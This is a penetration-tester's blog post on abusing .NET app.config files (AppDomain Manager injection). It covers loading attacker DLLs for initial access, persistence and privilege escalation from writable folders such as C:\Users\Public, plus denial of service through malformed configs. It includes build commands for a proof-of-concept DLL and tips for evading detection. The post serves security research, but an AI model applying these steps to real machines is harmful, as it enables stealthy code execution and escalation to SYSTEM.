Abusing .NET app.config for initial access, persistence, privilege escalation and denial of service
This one is about a neat technique which is still not so well-known at the time of writing this. It was presented to me as a method for gaining initial access, and then quite quickly I realized it can also become handy for other scenarios; persistence, privilege escalation and denial of service.
UPDATE: I just came across this article https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/, which refers to this mechanism as AppDomain Manager Injection.
Application Configuration Files
The mechanism has a quite general name - Application Configuration Files (https://learn.microsoft.com/en-us/windows/win32/sbscs/application-configuration-files), which are one of four different so-called Side-by-side (SxS) Manifest types (https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests). Quoting verbatim from MSDN:
"An application configuration file is an XML file used to control assembly binding. It can redirect an application from using one version of a side-by-side assembly to another version of the same assembly. This is called per-application configuration."
So how does this look like in practice?
Let's consider the following, extremely simple C# "application":
We can compile it by simply running csc, e.g.:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs
Now, before we execute it, let's run Procmon and create just one monitoring rule: Path contains test.exe:
Once we run the executable and then look into Procmon output, we should notice references to a file named test.exe.config:
So upon invoking test.exe, both the Client-Server Runtime Subsystem Service (csrss.exe service) and the executable itself are searching for a file named test.exe.config - the Application Configuration File. If that file exists and contains valid XML, as documented in the MSDN reference, various runtime behaviors can be changed. And the one we are especially interested in is the ability to make the relevant process load an arbitrary DLL file (in .NET referred to as an "assembly").
Case #1 - initial access.
I learned about this mechanism and its application for initial access by stumbling upon this project: https://github.com/Mr-Un1k0d3r/.NetConfigLoader. The idea could be described as the .NET version of DLL side-loading. We pick a well-known, benign and digitally signed executable and deliver it with a maliciously crafted .config file, which upon execution makes the new process load a DLL with our code. An additional advantage it gives to attackers is the fact that the DLL file can be hosted remotely, over the HTTP protocol, and is dynamically fetched. This makes the payload more difficult to detect and analyze, while giving the attacker more control over it and its distribution. This use case is documented by Mr-Un1k0d3r on his project's page, so I am referring you there if this is what you are looking for.
Case #2 - persistence.
You might already know one of my previous articles - https://hackingiscool.pl/pe-import-table-hijacking-as-a-way-of-achieving-persistence-or-exploiting-dll-side-loading/. So it is not surprising that when I saw this, I immediately thought about using this mechanism for persistence. From the technical perspective the only challenge is to find a .NET executable that is run frequently, either manually by users, as a scheduled task, autorun or any other means. The whole point of choosing this method is evasion. As long as we only create an XML file with the .config extension, and optionally (if we do not host our DLL remotely) drop a DLL file in a publicly readable (if we're targeting regular users) location, using this method will less likely get us caught.
Case #3 - privilege escalation.
Now, as I recently played more with privilege escalation on Windows, I also immediately thought about abusing this mechanism to exploit scenarios where a privileged process is executed from a directory we can create new files in. You know, our favorite locations such as C:\Windows\Temp, C:\Users\Public or C:\ProgramData, as by default everyone can create new files in them. So whenever any process uses any of those paths in its executable search order (https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa) or DLL loading search order (https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order) - which in most cases will happen when the executable called is located in that directory - we, as attackers, have an opportunity to simply create our own executable or DLL file with the particular name and have it loaded by the process we want to hijack.
Creation of malicious .config files is just another flavor of this attack, applicable to .NET executables.
Let's see how this works in practice by creating a little proof of concept.
First, let's copy the previous test.exe example into C:\Users\Public, where every user can create new files. Note that I did this as a user called "win10":
Eventually we will call this process from the SYSTEM user (using psexec).
Now, keep in mind that in this scenario by default it is possible for Interactive Users to modify this newly created file - due to the permission automatically inherited from the C:\Users\Public directory. Therefore exploitation for LPE is possible to regular users by simply overwriting the file or moving it and creating a new one named test.exe. But let's pretend that we don't have this permission, or even revoke it from the file for the app.config LPE poc:
Since all the ACEs on the test.exe file created in C:\Users\Public were inherited, this will effectively remove all of them, revoking any type of access from everyone:
So additionally I granted full control to the owner (win10) and SYSTEM.
Now just to confirm that our other (non-administrative) user named "normal" has no access to the file whatsoever:
LPE POC
OK, so how do we go about creating our privilege escalation exploit?
We will create two files:
- A DLL (.NET assembly) that will simply attempt to create a new text file named POC.txt in C:\Windows (only Administrators and SYSTEM can do that - remember, eventually we will run the target process (test.exe) from SYSTEM, using psexec). Our attacker - "normal" - will trick the process to load this DLL by crafing a proper test.exe.config file.
- test.config.exe Application Configuration File, referring to the DLL.
Here's the DLL:
Now, before we compile it, first we need to generate a Strong Name Key File (https://learn.microsoft.com/en-us/biztalk/core/how-to-configure-a-strong-name-assembly-key-file) for it. Do not confuse it with Authenticode digital signatures (https://learn.microsoft.com/en-us/windows-hardware/drivers/install/authenticode), these are two different things.
To generate the key file, we use the sn.exe tool from Visual Studio. Depending on your version of Visual Studio, adjust your path accordingly. After genering the key we will have to point it while compiling the executable.
On my system the commands were, respectively:
"C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\sn.exe" -k key.snk
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:POCDLL.dll /t:library /keyfile:key.snk POCDLL.cs
OK, now we need to extract the strong name from the POCDLL.dll file. We will need it when crafting the .config XML file.
An easy way to do this is by using powershell and invoking:
[System.Reflection.AssemblyName]::GetAssemblyName("C:\Users\Public\POCDLL.dll").FullName
The output I got for mine:
POCDLL, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cafc9db063be6f14
Finally, we create our test.exe.config file:
1 - The name of the target executable, without the extension.
2 - The strong name public key token.
3 - The path to our DLL (can be a href="http://server"), but in this case it is local, also located in C:\Users\Public.
4 - The name of the main class in our .NET DLL file (assembly).
We save it in the same directory as the executable we want to attack - in this case C:\Users\Public.
Both files - test.exe.config and POCDLL.dll - are created and owned by our regular user - "normal".
Now, before we launch test.exe as SYSTEM, using psexec, let's start Procmon first. This time the rule set we are interested in is:
- Path contains test.exe.
- Path ends with POC.txt.
Aaaand action!
Case #4 - denial of service.
Now, there is just one more case I found this mechanism "useful" for. What if we're not dealing with a .NET application, but a regular PE consisting of unmanaged code?
Let's see what happens if we copy - let's say ping.exe - to C:\Users\Public and then create an invalid ping.exe.config file:
Now let's try to run it, from the same SYSTEM session, to prove impact across security identities:
We can see that instead of help we got an error message:
"The application has failed to start because its side-by-side configuration is incorrect. Please see the application event log or use the command-line sxstrace.exe tool for more detail."
So, even if an application is not built in .NET, the corresponding .config file is checked and parsed, by csrss.exe (as visible in the third screenshot in the beginning of this article). And if it fails to parse it, the process won't start. So, if everything else fails and we can't inject our own code into the process, at least we can crash it. Just for the fun of it.